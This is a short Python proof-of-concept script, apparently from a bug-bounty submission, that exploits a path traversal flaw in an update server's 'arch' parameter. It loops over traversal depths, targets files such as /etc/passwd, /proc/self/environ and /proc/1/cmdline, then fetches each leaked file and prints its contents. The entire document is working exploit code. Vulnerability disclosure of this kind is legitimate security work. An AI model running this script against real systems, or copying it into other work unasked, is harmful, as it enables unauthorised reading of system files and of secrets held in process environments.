RosettaBugBounty/rosetta-sdu-2026-0000/poc1.py

import sys
import json
from urllib.request import urlopen
from urllib.error import URLError

url = sys.argv[1] if len(sys.argv) > 1 else "http://UPDSRV:8080"
url = url.rstrip("/")

targets = [
    "etc/hostname",
    "etc/passwd",
    "proc/1/cmdline",
    "proc/self/environ",
    "proc/cpuinfo",
]

for depth in range(1, 11):
    up = "/".join([".."] * depth)
    for target in targets:
        arch = f"{up}/{target}"
        params = f"platform=android&arch={arch}&app=1.0.0&kernel=0.0.0"
        try:
            with urlopen(f"{url}/updates/get?{params}", timeout=5) as resp:
                data = json.loads(resp.read())
        except (URLError, ValueError):
            continue

        update_needed = data.get("kernelUpdateRequired") or data.get("kernel_update_required")
        kernel_url = data.get("kernelUrl") or data.get("kernel_url")

        if update_needed and kernel_url and ".." in kernel_url:
            print(f"Found: {kernel_url}")
            try:
                with urlopen(url + kernel_url, timeout=5) as f:
                    content = f.read().decode("utf-8", errors="replace")
                    print(content[:1000])
            except URLError:
                print("Failed to download file.")
            sys.exit(0)

print("Not vulnerable")
sys.exit(1)